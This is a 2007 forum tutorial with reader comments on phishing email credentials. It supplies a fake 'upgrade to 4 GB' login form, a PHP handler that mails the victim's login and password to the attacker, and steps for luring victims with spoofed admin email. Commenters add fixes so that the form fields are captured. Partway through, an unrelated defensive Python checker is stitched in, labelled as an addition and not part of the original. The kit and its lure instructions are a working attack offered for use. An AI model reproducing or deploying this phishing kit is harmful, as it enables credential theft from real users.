Phishing - Email passwords via PHP

It is simple: all you need is a server with PHP support, a fake mailer and basic knowledge.



Firstly, what is phishing?
Phishing is a way to steal information about a person (a credit card number, a name, or a password to any service) by masquerading as a trustworthy person or business in an electronic communication. It is typically carried out using email or an instant messenger; we will use just e-mail.
The way to do this is PHP. We create a simple HTML form with a PHP script, which sends the input data to our email.
Now have a look at it:

What do we need?
a server with PHP support
a fake mailer
basic knowledge

How does it work?
There are two PHP files: one is form.php, the second is perform.php. form.php contains a form that asks for the login and pass of an e-mail account. When the user enters them and clicks Submit, form.php sends the input to perform.php, where the input is sent to your e-mail. Simple, huh?

Sources:

form.php
Code

<html>
<body>

<form action="perform.php" method="post">
<h1>Want more space?? Upgrade your account to 4 GB!!!</h1>
<b>Information about E-Mail Account:</b><br>
Login:  <input type="text" name="login" /><br>
<br>
Pass:  <input type="text" name="pass" /><br>
<br>
I want upgrade: <input type="checkbox"  disabled="yes" checked="yes" name="iwant" />
<input type="submit" value="Submit">
</form>

</body>
</html>





perform.php
Code

<?php
$to = "your-email@provider.etc";
$subject = "Password of user $login";
$message = "Hello! Password of user $login is $pass";
$from = "something@something.etc";
$headers = "From: $from";
mail($to,$subject,$message,$headers);
echo "User $login successfully upgraded";
?>




Next step...
Now change the email in perform.php to your email and upload both files to the server. Send the victim the URL to form.php with some nice comment... :D (for example: yourdomain.com/form.php), or, and this is better, send it from an admin or webmaster email (for example: admin@emailprovider.etc) for better effect (for this use a fake mailer) ;) .

That's all for now, friends!!
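
Seen from the defending side, both listings have traits that can be checked mechanically. The following Python check is an added example, not part of the original article: it flags a form that collects credential-named fields (and a password field that is not masked) and a PHP handler that passes credential-named variables to mail(). The name patterns and the FORM and HANDLER samples (trimmed copies of the listings above) are assumptions chosen for illustration.

```python
import re
from html.parser import HTMLParser

CRED = re.compile(r"pass|pwd|login|user", re.I)  # credential-like names (heuristic)

class FormAudit(HTMLParser):
    """Record every <form> with its action and its (name, type) inputs."""
    def __init__(self):
        super().__init__()
        self.forms = []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "inputs": []})
        elif tag == "input" and self.forms:
            self.forms[-1]["inputs"].append((a.get("name") or "", (a.get("type") or "text").lower()))

def audit_html(html):
    """Flag forms with credential-named fields and password fields that are not masked."""
    parser = FormAudit()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        cred = [(n, t) for n, t in form["inputs"] if CRED.search(n)]
        if cred:
            findings.append("credential form posts to " + form["action"])
        findings += [f"field '{n}' is type={t}, not password"
                     for n, t in cred if re.search(r"pass|pwd", n, re.I) and t != "password"]
    return findings

def audit_php(src):
    """Flag credential-named variables reaching mail(), directly or via one assignment."""
    assigned = dict(re.findall(r"\$(\w+)\s*=\s*([^;]*);", src))
    hits = set()
    for call in re.finditer(r"\bmail\s*\(([^;]*)\)\s*;", src):
        for arg in re.findall(r"\$(\w+)", call.group(1)):
            sources = [arg] + re.findall(r"\$(\w+)", assigned.get(arg, ""))
            hits.update(v for v in sources if CRED.search(v))
    return [f"mail() sends ${v}" for v in sorted(hits)]

# Sample input: trimmed copies of the form.php and perform.php listings above.
FORM = '''<form action="perform.php" method="post">
Login: <input type="text" name="login" /><br>
Pass: <input type="text" name="pass" /><br>
<input type="submit" value="Submit"></form>'''
HANDLER = '''<?php
$subject = "Password of user $login";
$message = "Hello! Password of user $login is $pass";
mail($to,$subject,$message,"From: x");
?>'''

if __name__ == "__main__":
    print(audit_html(FORM) + audit_php(HANDLER))
```

Name matching is a heuristic and also fires on legitimate login forms, so treat hits as candidates for review, for example when auditing a web root for files nobody on the team uploaded.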

Comments

-The_Flash- on February 13 2007 - 20:28:12
Excellent article Smile
netfish on February 13 2007 - 20:54:06
good job! went right to it. watch grammatical errors next time, besides that keep it up.
mastergamer on February 13 2007 - 21:41:21
Great article, however you missed the $_POST stuff out from perform.php Wink
-The_Flash- on February 13 2007 - 23:09:12
You wouldn't need it mastergamer... it's not writing to file. It's emailing directly and the mail headers look okay to me. Although I may end up standing corrected xD
dontspitonme on February 14 2007 - 00:57:48
he never defined $login and $pass
chislam on February 14 2007 - 01:16:52
that is true unless he is using register_globals otherwise use
Code
$login = $_POST['login']; $pass = $_POST['pass'];


chislam on February 14 2007 - 01:17:41
ugh use separate lines tho, for some reason it didn't go on to different lines when i posted it
tonzofgunz25 on February 14 2007 - 03:06:12
i like it!
dancuc on February 14 2007 - 09:28:49
thx all for comments Smile this is my first article, so i will try to write better next time... yeah i didn't define $login and $pass because i decided they are unnecessary. I tested it and it works fine Wink
Uber0n on February 14 2007 - 12:03:48
Well done B)
bl4ckc4t on February 14 2007 - 17:58:42
yes, i was also going to say, you missed the _post stuff, but, you were already corrected by the others -Bl4ckc4t